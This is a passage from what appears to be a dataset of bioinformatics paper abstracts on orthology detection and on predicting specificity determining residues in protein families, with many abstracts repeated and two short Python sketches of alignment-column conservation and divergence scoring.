both orthologs and in-paralogs. The program, called INPARANOID, was tested on all completely sequenced eukaryotic genomes. To assess the quality of INPARANOID results, ortholog clusters were generated from a dataset of worm and mammalian transmembrane proteins, and were compared to clusters derived by manual tree-based ortholog detection methods. This study led to the identification with a high degree of confidence of over a dozen novel worm-mammalian ortholog assignments that were previously undetected because of shortcomings of phylogenetic methods. A WWW server that allows searching for orthologs between human and several fully sequenced genomes is installed at http://www.cgb.ki.se/inparanoid/.
This is the first comprehensive resource with orthologs of all fully sequenced eukaryotic genomes. Programs and tables of orthology assignments are available from the same location. --- paper_title: Sequence comparison by sequence harmony identifies subtype-specific functional sites paper_content: Multiple sequence alignments are often used to reveal functionally important residues within a protein family. They can be particularly useful for the identification of key residues that determine functional differences between protein subfamilies. We present a new entropy-based method, Sequence Harmony (SH) that accurately detects subfamily-specific positions from a multiple sequence alignment. The SH algorithm implements a novel formula, able to score compositional differences between subfamilies, without imposing conservation, in a simple manner on an intuitive scale. We compare our method with the most important published methods, i.e. AMAS, TreeDet and SDP-pred, using three well-studied protein families: the receptor-binding domain (MH2) of the Smad family of transcription factors, the Ras-superfamily of small GTPases and the MIP-family of integral membrane transporters. We demonstrate that SH accurately selects known functional sites with higher coverage than the other methods for these test-cases. This shows that compositional differences between protein subfamilies provide sufficient basis for identification of functional sites. In addition, SH selects a number of sites of unknown function that could be interesting candidates for further experimental investigation. --- paper_title: SDPpred: a tool for prediction of amino acid residues that determine differences in functional specificity of homologous proteins. paper_content: SDPpred (Specificity Determining Position prediction) is a tool for prediction of residues in protein sequences that determine the proteins' functional specificity. It is designed for analysis of protein families whose members have biochemically similar but not identical interaction partners (e.g. different substrates for a family of transporters). SDPpred predicts residues that could be responsible for the proteins' choice of their correct interaction partners. The input of SDPpred is a multiple alignment of a protein family divided into a number of specificity groups, within which the interaction partner is believed to be the same. SDPpred does not require information about the secondary or three-dimensional structure of proteins. It produces a set of the alignment positions (specificity determining positions) that determine differences in functional specificity. SDPpred is available at http://math.genebee.msu.ru/~psn/. --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. 
Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Ensemble approach to predict specificity determinants: benchmarking and validation paper_content: BackgroundIt is extremely important and challenging to identify the sites that are responsible for functional specification or diversification in protein families. In this study, a rigorous comparative benchmarking protocol was employed to provide a reliable evaluation of methods which predict the specificity determining sites. Subsequently, three best performing methods were applied to identify new potential specificity determining sites through ensemble approach and common agreement of their prediction results.ResultsIt was shown that the analysis of structural characteristics of predicted specificity determining sites might provide the means to validate their prediction accuracy. For example, we found that for smaller distances it holds true that the more reliable the prediction method is, the closer predicted specificity determining sites are to each other and to the ligand.ConclusionWe observed certain similarities of structural features between predicted and actual subsites which might point to their functional relevance. We speculate that majority of the identified potential specificity determining sites might be indirectly involved in specific interactions and could be ideal target for mutagenesis experiments. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. 
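Several of the entries collected above (SPEER, Sequence Harmony, GroupSim, multi-RELIEF) share one core operation: scoring an alignment column by how strongly its amino acid composition differs between functional subfamilies while staying comparatively conserved within each subfamily. The Python sketch below illustrates only that between-subfamily comparison, using a symmetric Jensen-Shannon divergence over two subfamily columns; it is not the published SPEER or Sequence Harmony formula, and the function names, pseudocount value and example columns are assumptions made for this illustration.

```python
import math
from collections import Counter

AMINO_ACIDS = "ACDEFGHIKLMNPQRSTVWY"

def column_frequencies(column, pseudocount=1.0):
    """Amino acid frequencies for one alignment column of one subfamily.
    A small pseudocount keeps every frequency strictly positive."""
    counts = Counter(aa for aa in column if aa in AMINO_ACIDS)
    total = sum(counts.values()) + pseudocount * len(AMINO_ACIDS)
    return {aa: (counts[aa] + pseudocount) / total for aa in AMINO_ACIDS}

def kl_divergence(p, q):
    """Kullback-Leibler divergence in bits between two frequency dictionaries."""
    return sum(p[aa] * math.log2(p[aa] / q[aa]) for aa in AMINO_ACIDS)

def subfamily_divergence_score(column_a, column_b):
    """Jensen-Shannon divergence between the compositions of two subfamilies
    at the same alignment column; larger values flag candidate
    specificity determining positions."""
    p = column_frequencies(column_a)
    q = column_frequencies(column_b)
    m = {aa: 0.5 * (p[aa] + q[aa]) for aa in AMINO_ACIDS}
    return 0.5 * kl_divergence(p, m) + 0.5 * kl_divergence(q, m)

if __name__ == "__main__":
    # Hypothetical columns: D conserved in subfamily A, K conserved in subfamily B.
    print(subfamily_divergence_score("DDDDDD", "KKKKKK"))  # compositions differ -> higher score
    print(subfamily_divergence_score("DDDDDD", "DDDDDE"))  # nearly identical -> score near zero
```

A real tool would add what the abstracts above describe and this sketch omits: physico-chemical grouping of residues, evolutionary rate estimates, gap handling and significance testing across more than two subfamilies.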
--- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web sever for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/ programs/shmrwww. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. 
The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. 
::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. 
Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. 
Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at Bioinformatics online. --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web server for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/programs/shmrwww. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity.
::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: AL2CO: calculation of positional conservation in a protein sequence alignment paper_content: MOTIVATION ::: Amino acid sequence alignments are widely used in the analysis of protein structure, function and evolutionary relationships. Proteins within a superfamily usually share the same fold and possess related functions. These structural and functional constraints are reflected in the alignment conservation patterns. Positions of functional and/or structural importance tend to be more conserved. Conserved positions are usually clustered in distinct motifs surrounded by sequence segments of low conservation. Poorly conserved regions might also arise from the imperfections in multiple alignment algorithms and thus indicate possible alignment errors. Quantification of conservation by attributing a conservation index to each aligned position makes motif detection more convenient. Mapping these conservation indices onto a protein spatial structure helps to visualize spatial conservation features of the molecule and to predict functionally and/or structurally important sites. Analysis of conservation indices could be a useful tool in detection of potentially misaligned regions and will aid in improvement of multiple alignments. ::: ::: ::: RESULTS ::: We developed a program to calculate a conservation index at each position in a multiple sequence alignment using several methods. Namely, amino acid frequencies at each position are estimated and the conservation index is calculated from these frequencies. We utilize both unweighted frequencies and frequencies weighted using two different strategies. Three conceptually different approaches (entropy-based, variance-based and matrix score-based) are implemented in the algorithm to define the conservation index. Calculating conservation indices for 35522 positions in 284 alignments from SMART database we demonstrate that different methods result in highly correlated (correlation coefficient more than 0.85) conservation indices. Conservation indices show statistically significant correlation between sequentially adjacent positions i and i + j, where j < 13, and averaging of the indices over the window of three positions is optimal for motif detection. Positions with gaps display substantially lower conservation properties. We compare conservation properties of the SMART alignments or FSSP structural alignments to those of the ClustalW alignments. The results suggest that conservation indices should be a valuable tool of alignment quality assessment and might be used as an objective function for refinement of multiple alignments. ::: ::: ::: AVAILABILITY ::: The C code of the AL2CO program and its pre-compiled versions for several platforms as well as the details of the analysis are freely available at ftp://iole.swmed.edu/pub/al2co/. 
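The AL2CO entry above describes estimating amino-acid frequencies at each alignment position and turning them into a conservation index, with entropy-based, variance-based and matrix score-based variants. The short Python sketch below illustrates only the entropy-based variant on a toy alignment; it is not the AL2CO implementation, and the function names, gap handling and example data are assumptions made for the illustration.

```python
import math
from collections import Counter

def entropy_conservation(column, gap_chars="-."):
    """Entropy-based conservation for one alignment column.

    Returns a score in [0, 1]: 1 = fully conserved, 0 = maximally variable.
    Ignoring gap characters is a simplifying assumption of this sketch.
    """
    residues = [aa for aa in column.upper() if aa not in gap_chars]
    if not residues:
        return 0.0
    counts = Counter(residues)
    n = len(residues)
    entropy = -sum((c / n) * math.log2(c / n) for c in counts.values())
    max_entropy = math.log2(20)          # 20 amino-acid types
    return 1.0 - entropy / max_entropy   # normalize and invert

def conservation_profile(alignment):
    """Score every column of an equal-length list of aligned sequences."""
    columns = zip(*alignment)
    return [entropy_conservation("".join(col)) for col in columns]

if __name__ == "__main__":
    toy_msa = ["MKVLAT", "MKVIAT", "MKVLGT", "MRVLAT"]   # invented toy alignment
    for i, score in enumerate(conservation_profile(toy_msa), start=1):
        print(f"position {i}: conservation = {score:.2f}")
```

Averaging these per-position scores over a sliding window of three positions, which the abstract reports as optimal for motif detection, would be a small extension of this sketch.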
--- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: The Gene Ontology (GO) database and informatics resource. paper_content: The Gene Ontology (GO) project (http://www. 
geneontology.org/) provides structured, controlled vocabularies and classifications that cover several domains of molecular and cellular biology and are freely available for community use in the annotation of genes, gene products and sequences. Many model organism databases and genome annotation groups use the GO and contribute their annotation sets to the GO resource. The GO database integrates the vocabularies and contributed annotations and provides full access to this information in several formats. Members of the GO Consortium continually work collectively, involving outside experts as needed, to expand and update the GO vocabularies. The GO Web resource also provides access to extensive documentation about the GO project and links to applications that use GO data for functional analyses. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. 
Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. ::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. 
Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. 
The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Ensemble approach to predict specificity determinants: benchmarking and validation paper_content: Background: It is extremely important and challenging to identify the sites that are responsible for functional specification or diversification in protein families. In this study, a rigorous comparative benchmarking protocol was employed to provide a reliable evaluation of methods which predict the specificity determining sites. Subsequently, three best performing methods were applied to identify new potential specificity determining sites through ensemble approach and common agreement of their prediction results. Results: It was shown that the analysis of structural characteristics of predicted specificity determining sites might provide the means to validate their prediction accuracy.
